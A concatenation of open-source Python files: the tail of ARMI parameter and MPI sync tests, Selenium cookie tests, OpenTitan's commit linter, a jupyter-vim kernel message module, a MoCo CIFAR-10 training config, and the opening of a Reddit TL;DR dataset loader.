with pDefs.createBuilder(categories=["awesome", "stuff"]) as pb:
pb.defParam("p1", "units", "p1 description", "location")
pb.defParam(
"p2", "units", "p2 description", "location", categories=["bacon"]
)
with pDefs.createBuilder() as pb:
pb.defParam(
"p3", "units", "p3 description", "location", categories=["bacon"]
)
pc = MockPC()
self.assertEqual(pc.paramDefs.categories, set(["awesome", "stuff", "bacon"]))
p1 = pc.paramDefs["p1"]
p2 = pc.paramDefs["p2"]
p3 = pc.paramDefs["p3"]
self.assertEqual(p1.categories, set(["awesome", "stuff"]))
self.assertEqual(p2.categories, set(["awesome", "stuff", "bacon"]))
self.assertEqual(p3.categories, set(["bacon"]))
self.assertEqual(set(pc.paramDefs.inCategory("awesome")), set([p1, p2]))
self.assertEqual(set(pc.paramDefs.inCategory("stuff")), set([p1, p2]))
self.assertEqual(set(pc.paramDefs.inCategory("bacon")), set([p2, p3]))
def test_parameterCollectionsHave__slots__(self):
"""Make sure something is implemented to prevent accidental creation of attributes"""
self.assertEqual(
set(["_hist", "_backup", "assigned", "_p_serialNum", "serialNum"]),
set(parameters.ParameterCollection._slots),
)
class MockPC(parameters.ParameterCollection):
pass
pc = MockPC()
# No longer protecting against __dict__ access. If someone REALLY wants to
# staple something to a parameter collection with no guarantees of anything,
# that's on them
# with self.assertRaises(AttributeError):
# pc.__dict__["foo"] = 5
with self.assertRaises(AssertionError):
pc.whatever = 22
# try again after using a ParameterBuilder
class MockPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
# use of the ParameterBuilder creates an empty __slots__
with pDefs.createBuilder() as pb:
pb.defParam("p0", "units", "p0 description", "location")
pc = MockPC()
self.assertTrue("_p_p0" in MockPC._slots)
# Make sure we aren't making any weird copies of anything
self.assertTrue(pc._slots is MockPC._slots)
with self.assertRaises(AssertionError):
pc.whatever = 33
self.assertEqual(["serialNum"], pc.keys())
pc.p0 = "hi"
self.assertEqual({"p0", "serialNum"}, set(pc.keys()))
# Also make sure that subclasses of ParameterCollection subclasses use __slots__
class MockPCChild(MockPC):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("p2", "foo", "bar")
pcc = MockPCChild()
with self.assertRaises(AssertionError):
pcc.whatever = 33
class MockSyncPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder(
default=0.0, location=parameters.ParamLocation.AVERAGE
) as pb:
pb.defParam("param1", "units", "p1 description", categories=["cat1"])
pb.defParam("param2", "units", "p2 description", categories=["cat2"])
pb.defParam("param3", "units", "p3 description", categories=["cat3"])
def makeComp(name):
c = composites.Composite(name)
c.p = MockSyncPC()
return c
class SynchronizationTests:
"""Some unit tests that must be run with mpirun instead of the standard unittest system."""
def setUp(self):
self.r = makeComp("reactor")
self.r.core = makeComp("core")
self.r.add(self.r.core)
for ai in range(armi.MPI_SIZE * 4):
a = makeComp("assembly{}".format(ai))
self.r.core.add(a)
for bi in range(10):
a.add(makeComp("block{}-{}".format(ai, bi)))
self.comps = [self.r.core] + self.r.core.getChildren(deep=True)
for pd in MockSyncPC().paramDefs:
pd.assigned = parameters.NEVER
def tearDown(self):
del self.r
def run(self, testNamePrefix="mpitest_"):
with open("mpitest{}.temp".format(armi.MPI_RANK), "w") as self.l:
for methodName in sorted(dir(self)):
if methodName.startswith(testNamePrefix):
self.write("{}.{}".format(self.__class__.__name__, methodName))
try:
self.setUp()
getattr(self, methodName)()
except Exception:
self.write("failed, big time")
traceback.print_exc(file=self.l)
self.write("*** printed exception")
try:
self.tearDown()
except:
pass
self.l.write("done.")
def write(self, msg):
self.l.write("{}\n".format(msg))
self.l.flush()
def assertRaises(self, exceptionType):
class ExceptionCatcher:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is exceptionType:
return True
raise AssertionError(
"Expected {}, but got {}".format(exceptionType, exc_type)
)
return ExceptionCatcher()
def assertEqual(self, expected, actual):
if expected != actual:
raise AssertionError(
"(expected) {} != {} (actual)".format(expected, actual)
)
def assertNotEqual(self, expected, actual):
if expected == actual:
raise AssertionError(
"(expected) {} == {} (actual)".format(expected, actual)
)
def mpitest_noConflicts(self):
for ci, comp in enumerate(self.comps):
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param1 = (armi.MPI_RANK + 1) * 30.0
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param1)
# numUpdates = len(self.comps) // armi.MPI_SIZE + (len(self.comps) % armi.MPI_SIZE > armi.MPI_RANK)
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param1)
def mpitest_noConflicts_setByString(self):
"""Make sure params set by string also work with sync."""
for ci, comp in enumerate(self.comps):
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param2 = (armi.MPI_RANK + 1) * 30.0
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param2)
# numUpdates = len(self.comps) // armi.MPI_SIZE + (len(self.comps) % armi.MPI_SIZE > armi.MPI_RANK)
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param2)
def mpitest_withConflicts(self):
self.r.core.p.param1 = (armi.MPI_RANK + 1) * 99.0
with self.assertRaises(ValueError):
self.r.syncMpiState()
def mpitest_withConflictsButSameValue(self):
self.r.core.p.param1 = (armi.MPI_SIZE + 1) * 99.0
self.r.syncMpiState()
self.assertEqual((armi.MPI_SIZE + 1) * 99.0, self.r.core.p.param1)
def mpitest_noConflictsMaintainWithStateRetainer(self):
assigned = []
with self.r.retainState(parameters.inCategory("cat1")):
for ci, comp in enumerate(self.comps):
comp.p.param2 = 99 * ci
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param1 = (armi.MPI_RANK + 1) * 30.0
assigned.append(parameters.SINCE_ANYTHING)
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param1)
assigned.append(parameters.NEVER)
# 1st inside state retainer
self.assertEqual(
True, all(c.p.assigned == parameters.SINCE_ANYTHING for c in self.comps)
)
# confirm outside state retainer
self.assertEqual(assigned, [c.p.assigned for ci, c in enumerate(self.comps)])
# this rank's "assigned" components are not assigned on the workers, and so will be updated
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param1)
def mpitest_conflictsMaintainWithStateRetainer(self):
with self.r.retainState(parameters.inCategory("cat2")):
for _, comp in enumerate(self.comps):
comp.p.param2 = 99 * armi.MPI_RANK
with self.assertRaises(ValueError):
self.r.syncMpiState()
def mpitest_rxCoeffsProcess(self):
"""This test mimics the process for rxCoeffs when doing distributed doppler"""
def do():
# we will do this over 4 passes (there are 4 * MPI_SIZE assemblies)
for passNum in range(4):
with self.r.retainState(parameters.inCategory("cat2")):
self.r.p.param3 = "hi"
for c in self.comps:
c.p.param1 = (
99 * armi.MPI_RANK
) # this will get reset after state retainer
a = self.r.core[passNum * armi.MPI_SIZE + armi.MPI_RANK]
a.p.param2 = armi.MPI_RANK * 20.0
for b in a:
b.p.param2 = armi.MPI_RANK * 10.0
for ai, a2 in enumerate(self.r):
if ai % armi.MPI_SIZE != armi.MPI_RANK:
assert "param2" not in a2.p
self.assertEqual(parameters.SINCE_ANYTHING, param1.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param2.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param3.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, a.p.assigned)
self.r.syncMpiState()
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param1.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param2.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param3.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
a.p.assigned,
)
self.assertEqual(parameters.NEVER, param1.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param2.assigned)
self.assertEqual(parameters.NEVER, param3.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, a.p.assigned)
do_assert(passNum)
param1 = self.r.p.paramDefs["param1"]
param2 = self.r.p.paramDefs["param2"]
param3 = self.r.p.paramDefs["param3"]
def do_assert(passNum):
# ensure all assemblies and blocks set values for param2, but param1 is empty
for rank in range(armi.MPI_SIZE):
a = self.r.core[passNum * armi.MPI_SIZE + rank]
assert "param1" not in a.p
assert "param3" not in a.p
self.assertEqual(rank * 20, a.p.param2)
for b in a:
self.assertEqual(rank * 10, b.p.param2)
assert "param1" not in b.p
assert "param3" not in b.p
if armi.MPI_RANK == 0:
with self.r.retainState(parameters.inCategory("cat2")):
armi.MPI_COMM.bcast(self.r)
do()
[do_assert(passNum) for passNum in range(4)]
[do_assert(passNum) for passNum in range(4)]
else:
del self.r
self.r = armi.MPI_COMM.bcast(None)
do()
if __name__ == "__main__":
if armi.MPI_SIZE == 1:
unittest.main()
else:
SynchronizationTests().run()
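# Editor's note (hedged): run as a single process this file executes the regular
# unittest suite; the SynchronizationTests only run under MPI, e.g. something like
# `mpiexec -n 2 python test_parameters.py` (the exact launcher depends on the ARMI setup).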
|
py/test/selenium/webdriver/common/cookie_tests.py | vinay-qa/vinayit-android-server-apk | 2,151 | 12738849 | <filename>py/test/selenium/webdriver/common/cookie_tests.py<gh_stars>1000+
import calendar
import time
import unittest
import random
import pytest
from selenium.test.selenium.webdriver.common import utils
class CookieTest(unittest.TestCase):
def setUp(self):
self._loadPage("simpleTest")
# Set the cookie to expire in 30 minutes
timestamp = calendar.timegm(time.gmtime()) + (30 * 60)
self.COOKIE_A = {"name": "foo",
"value": "bar",
"path": "/",
"secure": False}
def tearDown(self):
self.driver.delete_all_cookies()
def testAddCookie(self):
self.driver.execute_script("return document.cookie")
self.driver.add_cookie(self.COOKIE_A)
cookie_returned = str(self.driver.execute_script("return document.cookie"))
self.assertTrue(self.COOKIE_A["name"] in cookie_returned)
def testAddingACookieThatExpiredInThePast(self):
if self.driver.name == 'internet explorer':
pytest.skip("Issue needs investigating")
cookie = self.COOKIE_A.copy()
cookie["expiry"] = calendar.timegm(time.gmtime()) - 1
self.driver.add_cookie(cookie)
cookies = self.driver.get_cookies()
self.assertEquals(0, len(cookies))
def testDeleteAllCookie(self):
self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A))
self.driver.delete_all_cookies()
self.assertFalse(self.driver.get_cookies())
def testDeleteCookie(self):
self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A))
self.driver.delete_cookie("foo")
self.assertFalse(self.driver.get_cookies())
def testShouldGetCookieByName(self):
key = "key_%d" % int(random.random()*10000000)
self.driver.execute_script("document.cookie = arguments[0] + '=set';", key)
cookie = self.driver.get_cookie(key)
self.assertEquals("set", cookie["value"])
def testGetAllCookies(self):
key1 = "key_%d" % int(random.random()*10000000)
key2 = "key_%d" % int(random.random()*10000000)
cookies = self.driver.get_cookies()
count = len(cookies)
one = {"name" :key1,
"value": "value"}
two = {"name":key2,
"value": "value"}
self.driver.add_cookie(one)
self.driver.add_cookie(two)
self._loadPage("simpleTest")
cookies = self.driver.get_cookies()
self.assertEquals(count + 2, len(cookies))
def testShouldNotDeleteCookiesWithASimilarName(self):
cookieOneName = "fish"
cookie1 = {"name" :cookieOneName,
"value":"cod"}
cookie2 = {"name" :cookieOneName + "x",
"value": "earth"}
self.driver.add_cookie(cookie1)
self.driver.add_cookie(cookie2)
self.driver.delete_cookie(cookieOneName)
cookies = self.driver.get_cookies()
self.assertFalse(cookie1["name"] == cookies[0]["name"], msg=str(cookies))
self.assertEquals(cookie2["name"] , cookies[0]["name"], msg=str(cookies))
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
def _pageURL(self, name):
return "http://localhost:%d/%s.html" % (self.webserver.port, name)
|
util/lint_commits.py | asb/opentitan | 1,375 | 12738856 | <gh_stars>1000+
#!/usr/bin/env python3
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import re
import sys
from git import Repo
error_msg_prefix = 'ERROR: '
warning_msg_prefix = 'WARNING: '
# Maximum length of the summary line in the commit message (the first line)
# There is no hard limit, but a typical convention is to keep this line at or
# below 50 characters, with occasional outliers.
COMMIT_MSG_MAX_SUMMARY_LEN = 100
def error(msg, commit=None):
full_msg = msg
if commit:
full_msg = "Commit %s: %s" % (commit.hexsha, msg)
print(error_msg_prefix + full_msg, file=sys.stderr)
def warning(msg, commit=None):
full_msg = msg
if commit:
full_msg = "Commit %s: %s" % (commit.hexsha, msg)
print(warning_msg_prefix + full_msg, file=sys.stderr)
def lint_commit_author(commit):
success = True
if commit.author.email.endswith('users.noreply.github.com'):
error(
            'Commit author has no valid email address set: '
            f'{commit.author.email!r}. '
'Use "git config user.email <EMAIL>" to '
'set a valid email address, then update the commit '
'with "git rebase -i" and/or '
'"git commit --amend --signoff --reset-author". '
'Also check your GitHub settings at '
'https://github.com/settings/emails: your email address '
'must be verified, and the option "Keep my email address '
'private" must be disabled. '
'This command will also sign off your commit indicating agreement '
'to the Contributor License Agreement. See CONTRIBUTING.md for '
'more details.', commit)
success = False
if ' ' not in commit.author.name:
warning(
f'The commit author name {commit.author.name!r} contains no space. '
'Use "git config user.name \'<NAME>\'" to '
'set your real name, and update the commit with "git rebase -i " '
'and/or "git commit --amend --signoff --reset-author". '
'This command will also sign off your commit indicating agreement '
'to the Contributor License Agreement. See CONTRIBUTING.md for '
'more details.', commit)
# A warning doesn't fail lint.
return success
def lint_commit_message(commit):
success = True
lines = commit.message.splitlines()
# Check length of summary line.
summary_line_len = len(lines[0])
if summary_line_len > COMMIT_MSG_MAX_SUMMARY_LEN:
error(
"The summary line in the commit message is %d characters long; "
"only %d characters are allowed." %
(summary_line_len, COMMIT_MSG_MAX_SUMMARY_LEN), commit)
success = False
# Check for an empty line separating the summary line from the long
# description.
if len(lines) > 1 and lines[1] != "":
error(
"The second line of a commit message must be empty, as it "
"separates the summary from the long description.", commit)
success = False
# Check that the commit message contains at least one Signed-off-by line
# that matches the author name and email. There might be other signoffs (if
# there are multiple authors). We don't have any requirements about those
# at the moment and just pass them through.
signoff_lines = []
signoff_pfx = 'Signed-off-by: '
for idx, line in enumerate(lines):
if not line.startswith(signoff_pfx):
continue
signoff_body = line[len(signoff_pfx):]
match = re.match(r'[^<]+ <[^>]*>$', signoff_body)
if match is None:
error('Commit has Signed-off-by line {!r}, but the second part '
'is not of the required form. It should be of the form '
'"Signed-off-by: NAME <EMAIL>".'
.format(line))
success = False
signoff_lines.append(line)
expected_signoff_line = ("Signed-off-by: {} <{}>"
.format(commit.author.name,
commit.author.email))
signoff_req_msg = ('The commit message must contain a Signed-off-by line '
'that matches the commit author name and email, '
'indicating agreement to the Contributor License '
'Agreement. See CONTRIBUTING.md for more details. '
'You can use "git commit --signoff" to ask git to add '
'this line for you.')
if not signoff_lines:
error('Commit has no Signed-off-by line. ' + signoff_req_msg)
success = False
elif expected_signoff_line not in signoff_lines:
error(('Commit has one or more Signed-off-by lines, but not the one '
'we expect. We expected to find "{}". '
.format(expected_signoff_line)) +
signoff_req_msg)
success = False
return success
def lint_commit(commit):
success = True
if not lint_commit_author(commit):
success = False
if not lint_commit_message(commit):
success = False
return success
def main():
global error_msg_prefix
global warning_msg_prefix
parser = argparse.ArgumentParser(
description='Check commit metadata for common mistakes')
parser.add_argument('--error-msg-prefix',
default=error_msg_prefix,
required=False,
help='string to prepend to all error messages')
parser.add_argument('--warning-msg-prefix',
default=warning_msg_prefix,
required=False,
help='string to prepend to all warning messages')
parser.add_argument('--no-merges',
required=False,
action="store_true",
help='do not check commits with more than one parent')
parser.add_argument('commit_range',
metavar='commit-range',
help=('commit range to check '
'(must be understood by git log)'))
args = parser.parse_args()
error_msg_prefix = args.error_msg_prefix
warning_msg_prefix = args.warning_msg_prefix
lint_successful = True
repo = Repo()
commits = repo.iter_commits(args.commit_range)
for commit in commits:
print("Checking commit %s" % commit.hexsha)
is_merge = len(commit.parents) > 1
if is_merge and args.no_merges:
print("Skipping merge commit.")
continue
if not lint_commit(commit):
lint_successful = False
if not lint_successful:
error('Commit lint failed.')
sys.exit(1)
if __name__ == '__main__':
main()
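# Editor's note (hedged): typical invocation against a branch range, for example
#   ./lint_commits.py --no-merges origin/master..HEAD
# The positional commit-range argument is passed straight to GitPython's iter_commits().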
|
pythonx/message_parser.py | matbb/jupyter-vim | 187 | 12738868 | """
Jupyter <-> Vim
See: <http://jupyter-client.readthedocs.io/en/stable/api/client.html>
"""
# Standard
import re
from textwrap import dedent
from threading import Thread, Lock
from time import sleep
# Py module
from jupyter_client import KernelManager
import vim
# Local
from jupyter_util import echom, unquote_string, match_kernel_id, get_vim
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
# Local
from language import list_languages
class VimMessenger():
"""Handle message to/from Vim
Attributes
----------
sync : :obj:`Sync`
Object to support asynchronous operations.
message_queue : :obj:`Queue`
Asynchronous queue of messages.
pid : int
PID of the current vim session.
verbose : bool
If True, receive message id from sending function and report back to
vim with output, silent otherwise.
monitor_console : bool
If True, create a new buffer in vim to display output from the kernel.
cell_separators : list of str
User-defined list of strings that separate code cells.
"""
def __init__(self, sync):
self.sync = sync
self.message_queue = Queue() # for async echom
self.pid = get_vim('getpid()', -1) # pid of current vim session
# Define members python <- vim
self.set_monitor_bools()
self.set_cell_separators()
def set_monitor_bools(self):
"""Set booleans to define if jupyter_vim monitors messages."""
# NOTE this function is called by the @monitor_decorator in jupyter_vim
# to ensure user options are up-to-date.
self.verbose = bool(int(vim.vars.get('jupyter_verbose', 0)))
self.monitor_console = bool(int(vim.vars.get('jupyter_monitor_console', 0)))
def set_cell_separators(self):
"""Set cell separators (list of str)."""
# NOTE this function is called from jupyter_vim.run_cell
self.cell_separators = get_vim('g:jupyter_cell_separators', '')
self.cell_separators = [unquote_string(x) for x in self.cell_separators]
@staticmethod
def get_timer_intervals():
"""Return list of user-defined timers [ms].
Returns
-------
list of int
List of timers [ms].
"""
timer_list = get_vim('g:jupyter_timer_intervals', [0.1, 0.5, 1, 3])
return [int(x) for x in timer_list]
@staticmethod
def get_meta_messages():
"""Return list of user-defined list of meta messages.
Returns
-------
list of str
List of user-defined meta messages to send before/after code.
"""
return (get_vim('b:jupyter_exec_before', ''),
get_vim('b:jupyter_exec_pre', ''),
get_vim('b:jupyter_exex_post', ''),
get_vim('b:jupyter_exec_after', '')
)
def is_cell_separator(self, line):
"""Return True if given `line` is a cell separator."""
return any([bool(re.match(separation, line.strip()))
for separation in self.cell_separators])
def thread_echom(self, arg, **args):
"""Wrap echo async: put message to be echoed in a queue."""
self.message_queue.put((arg, args))
def timer_echom(self):
"""Call echom sync on all messages in queue."""
# Check in
if self.message_queue.empty():
return
# Show user the force
while not self.message_queue.empty():
(arg, args) = self.message_queue.get_nowait()
echom(arg, **args)
# Restore peace in the galaxy
vim.command('redraw')
# TODO add verbose flag
def string_hi(self):
"""Return Hi from vim string."""
return ('\\n\\nReceived connection from vim client with pid {}'
'\\n' + '-' * 60 + '\\n').format(self.pid)
def thread_echom_kernel_info(self, kernel_info):
"""Echo kernel info (async).
Parameters
----------
kernel_info : str
Information about the kernel to print in vim messages.
"""
kernel_string = '\n '.join([str(key) + ': ' + str(kernel_info[key])
for key in kernel_info])
# Send command so that user knows vim is connected at bottom, more readable
self.thread_echom('Connected: {}'.format(kernel_info['id']), style='Question')
# FIXME messages does not actually display in vim,
# only appears in `:messages` command.
self.thread_echom('To:', style='Question')
self.thread_echom(kernel_string)
class JupyterMessenger():
"""Handle primitive messages to/from jupyter kernel.
Attributes
----------
km_client : :obj:`KernelManager` client
Object to handle connections with the kernel.
See: <http://jupyter-client.readthedocs.io/en/stable/api/client.html>
kernel_info : dict
Information about the kernel itself.
dict with keys:
'kernel_type' : str, the type of kernel, i.e. `python`.
'pid' : int, the pid of the kernel process.
'cwd' : str, the current working directory of the kernel.
'hostname' : str, the hostname of the kernel.
cfile : str
Filename of the connection file, i.e. `kernel-123.json`.
sync : :obj:`Sync`
Object to support asynchronous operations.
meta_messages : list of str
User-defined meta messages to send before/after code.
"""
def __init__(self, sync):
self.km_client = None # KernelManager client
self.kernel_info = dict() # Kernel information
self.cfile = '' # Connection file
self.sync = sync # Sync object
self.meta_messages = VimMessenger.get_meta_messages()
def create_kernel_manager(self):
"""Create the kernel manager and connect a client.
Returns
-------
bool
True if client connects successfully, False on failure.
"""
# Get client
kernel_manager = KernelManager(connection_file=self.cfile)
# The json may be badly encoding especially if autoconnecting
try:
kernel_manager.load_connection_file()
except Exception:
return False
self.km_client = kernel_manager.client()
# Open channel
self.km_client.start_channels()
# Ping the kernel
self.km_client.kernel_info()
try:
self.km_client.get_shell_msg(timeout=1)
return True
except Empty:
return False
def disconnnect(self):
"""Disconnect silently from kernel and close channels."""
if self.km_client is None:
return
self.km_client.stop_channels()
self.km_client = None
def update_meta_messages(self):
"""Sync: reread vim meta vars."""
self.meta_messages = VimMessenger.get_meta_messages()
def check_connection(self):
"""Check that we have a client connected to the kernel.
Returns
-------
bool
True if client is connected, False if not.
"""
return self.km_client.hb_channel.is_beating() if self.km_client else False
def check_connection_or_warn(self):
"""Echo warning if not connected.
Returns
-------
bool
True if client is connected, False if not.
"""
if self.check_connection():
return True
echom('WARNING: Not connected to Jupyter!'
'\nRun :JupyterConnect to find the kernel', style='WarningMsg')
return False
def get_pending_msgs(self):
"""Get pending message pool.
Returns
-------
list of :obj:`msg`
List of messages waiting on the `iopub_channel`.
"""
msgs = list()
try:
self.sync.msg_lock.acquire()
msgs = self.km_client.iopub_channel.get_msgs()
except (Empty, TypeError, KeyError, IndexError, ValueError):
pass
finally:
self.sync.msg_lock.release()
return msgs
def get_reply_msg(self, msg_id):
"""Get kernel reply from sent client message with msg_id (async).
This function can block 3 sec, so call in a thread.
Returns
-------
dict
Message response.
"""
# TODO handle 'is_complete' requests?
# <http://jupyter-client.readthedocs.io/en/stable/messaging.html#code-completeness>
# Declare default
reply = dict()
for _ in range(3):
# Check
if self.sync.stop:
return dict()
# Get
self.sync.msg_lock.acquire()
try:
reply = self.km_client.get_shell_msg(block=True, timeout=1) or {}
except (Empty, TypeError, KeyError, IndexError, ValueError):
pass
finally:
self.sync.msg_lock.release()
# Stop
if reply.get('parent_header', {}).get('msg_id', -1) == msg_id:
break
return reply
def send(self, msg, ismeta=False, **kwargs):
"""Send a message to the kernel client.
.. note:: Async: crossroad <- run_command
Global: -> cmd, cmd_id
Returns
-------
int
Command id.
"""
if not self.check_connection_or_warn():
return -1
# Pre
if not ismeta:
bef, pre, post, aft = self.meta_messages
# Send before unless it is blank
if bef:
self.send(bef, ismeta=True)
# Craft new message
msg = pre + msg + post
# Include dedent of msg so we don't get odd indentation errors.
cmd = dedent(msg)
# Actually send execute_request
cmd_id = self.km_client.execute(cmd, **kwargs)
# Send after unless it is blank
if not ismeta and aft:
self.send(aft, ismeta=True)
return cmd_id
def get_kernel_info(self, language):
"""Explicitly ask the jupyter kernel for its pid
.. note:: Thread: <- cfile
<- vim_pid
-> lang
-> kernel_pid
Returns
-------
dict
dict with keys: {'kernel_type', 'pid', 'cwd', 'hostname'}
"""
# Check in
if self.kernel_info['kernel_type'] not in list_languages():
            echom('I don\'t know how to get info for a Jupyter kernel of type "{}"'
.format(self.kernel_info['kernel_type']), 'WarningMsg')
# Fill kernel_info
self.kernel_info.update({
'connection_file': self.cfile,
'id': match_kernel_id(self.cfile), # int id of cfile
# Get from kernel info
'pid': self.send_code_and_get_reply(language.pid), # PID of kernel
'cwd': self.send_code_and_get_reply(language.cwd),
'hostname': self.send_code_and_get_reply(language.hostname),
})
# Return
return self.kernel_info
def send_code_and_get_reply(self, code):
"""Get variable _res from code string.
.. note:: Only used by get_kernel_info (internal) => send with ismeta.
Returns
-------
str
Unquoted string of the message reply.
"""
# Send message
msg_id = self.send(code, ismeta=True, silent=True, user_expressions={'_res': '_res'})
# Wait to get message back from kernel (1 sec)
reply = self.get_reply_msg(msg_id)
# Get _res from user expression
res = reply.get('content', {}).get('user_expressions', {}) \
.get('_res', {}).get('data', {}).get('text/plain', -1)
# Try again parse messages
if res == -1:
line_number = reply.get('content', {}).get('execution_count', -1)
msgs = self.get_pending_msgs()
res = parse_iopub_for_reply(msgs, line_number)
# Rest in peace
return unquote_string(res)
class Sync():
"""Synchronization (not so) primitives, for safe thread support.
Attributes
----------
thread : :obj:`Thread` or None
The running thread.
    stop : bool
        True if the running thread has been asked to stop, False otherwise.
line_queue : :obj:`Queue`
Queue of lines of code to echo to the kernel.
msg_lock : :obj:`Lock`
lock to retrieve messages one thread at a time.
"""
def __init__(self):
self.thread = None
self.stop = False
self.line_queue = Queue()
self.msg_lock = Lock()
def check_stop(self):
"""Check and reset stop value.
Returns
-------
bool
Last value of `self.stop`.
"""
last = self.stop
if self.stop:
self.stop = False
return last
def stop_thread(self):
"""Stop current thread."""
if self.thread is None:
return
if not self.thread.is_alive():
self.thread = None
return
        # Wait up to 1 sec for the thread to acknowledge the stop flag
        self.stop = True
        for _ in range(100):
            if not self.stop:
                break
            sleep(0.010)
self.thread = None
return
def start_thread(self, target=None, args=None):
"""Stop last / Create new / Start thread.
Parameters
----------
target : callable, optional, default=None
Callable object to which `args` will be passed.
args : list, optional, default=None
"""
if args is None:
args = list()
self.stop_thread()
self.thread = Thread(target=target, args=args, daemon=True)
self.thread.start()
# -----------------------------------------------------------------------------
# Parsers
# -----------------------------------------------------------------------------
def parse_iopub_for_reply(msgs, line_number):
"""Get kernel response from message pool (Async).
    .. note:: some kernels (e.g. iperl) do not discriminate when the client asks
        for `user_expressions`, but they still give a printable output.
Parameters
----------
msgs : list
List of messages to parse.
line_number : int
The message number of the corresponding code.
Returns
-------
str
The kernel response to the messages.
"""
res = -1
# Parse all execute
for msg in msgs:
# Get the result of execution
content = msg.get('content', False)
if not content:
continue
ec = int(content.get('execution_count', 0))
if not ec:
continue
if line_number not in (-1, ec):
continue
msg_type = msg.get('header', {}).get('msg_type', '')
if msg_type not in ('execute_result', 'stream'):
continue
res = content.get('data', {}).get('text/plain', -1)
res = res if res != -1 else content.get('text', -1)
break
return res
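# Hedged illustration (hypothetical message dicts, not taken from a real kernel):
#   msgs = [{'header': {'msg_type': 'execute_result'},
#            'content': {'execution_count': 4,
#                        'data': {'text/plain': "'42'"}}}]
#   parse_iopub_for_reply(msgs, 4)  # -> "'42'"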
|
configs/small/cifar10/moco_ccrop.py | xyupeng/ContrastiveCrop | 148 | 12738898 | # python DDP_moco_ccrop.py path/to/this/config
# model
dim = 128
model = dict(type='ResNet', depth=18, num_classes=dim, maxpool=False)
moco = dict(dim=dim, K=65536, m=0.999, T=0.20, mlp=True)
loss = dict(type='CrossEntropyLoss')
# data
root = '/path/to/your/dataset'
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
batch_size = 512
num_workers = 4
data = dict(
train=dict(
ds_dict=dict(
type='CIFAR10_boxes',
root=root,
train=True,
),
rcrop_dict=dict(
type='cifar_train_rcrop',
mean=mean, std=std
),
ccrop_dict=dict(
type='cifar_train_ccrop',
alpha=0.1,
mean=mean, std=std
),
),
eval_train=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=True,
),
trans_dict=dict(
type='cifar_test',
mean=mean, std=std
),
),
)
# boxes
warmup_epochs = 100
loc_interval = 100
box_thresh = 0.10
# training optimizer & scheduler
epochs = 500
lr = 0.5
optimizer = dict(type='SGD', lr=lr, momentum=0.9, weight_decay=1e-4)
lr_cfg = dict( # passed to adjust_learning_rate(cfg=lr_cfg)
type='Cosine',
steps=epochs,
lr=lr,
decay_rate=0.1,
# decay_steps=[100, 150]
warmup_steps=0,
# warmup_from=0.01
)
# log & save
log_interval = 20
save_interval = 250
work_dir = None # rewritten by args
resume = None
load = None
port = 10001
|
datasets/reddit/reddit.py | dkajtoch/datasets | 10,608 | 12738902 | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Reddit dataset using tldr as summaries."""
import json
import os
import datasets
_CITATION = """
@inproceedings{volske-etal-2017-tl,
title = {TL;DR: Mining {R}eddit to Learn Automatic Summarization},
author = {<NAME> and <NAME> and <NAME> and <NAME>},
booktitle = {Proceedings of the Workshop on New Frontiers in Summarization},
month = {sep},
year = {2017},
address = {Copenhagen, Denmark},
publisher = {Association for Computational Linguistics},
url = {https://www.aclweb.org/anthology/W17-4508},
doi = {10.18653/v1/W17-4508},
pages = {59--63},
abstract = {Recent advances in automatic text summarization have used deep neural networks to generate high-quality abstractive summaries, but the performance of these models strongly depends on large amounts of suitable training data. We propose a new method for mining social media for author-provided summaries, taking advantage of the common practice of appending a {``}TL;DR{''} to long posts. A case study using a large Reddit crawl yields the Webis-TLDR-17 dataset, complementing existing corpora primarily from the news genre. Our technique is likely applicable to other social media sites and general web crawls.},
}
"""
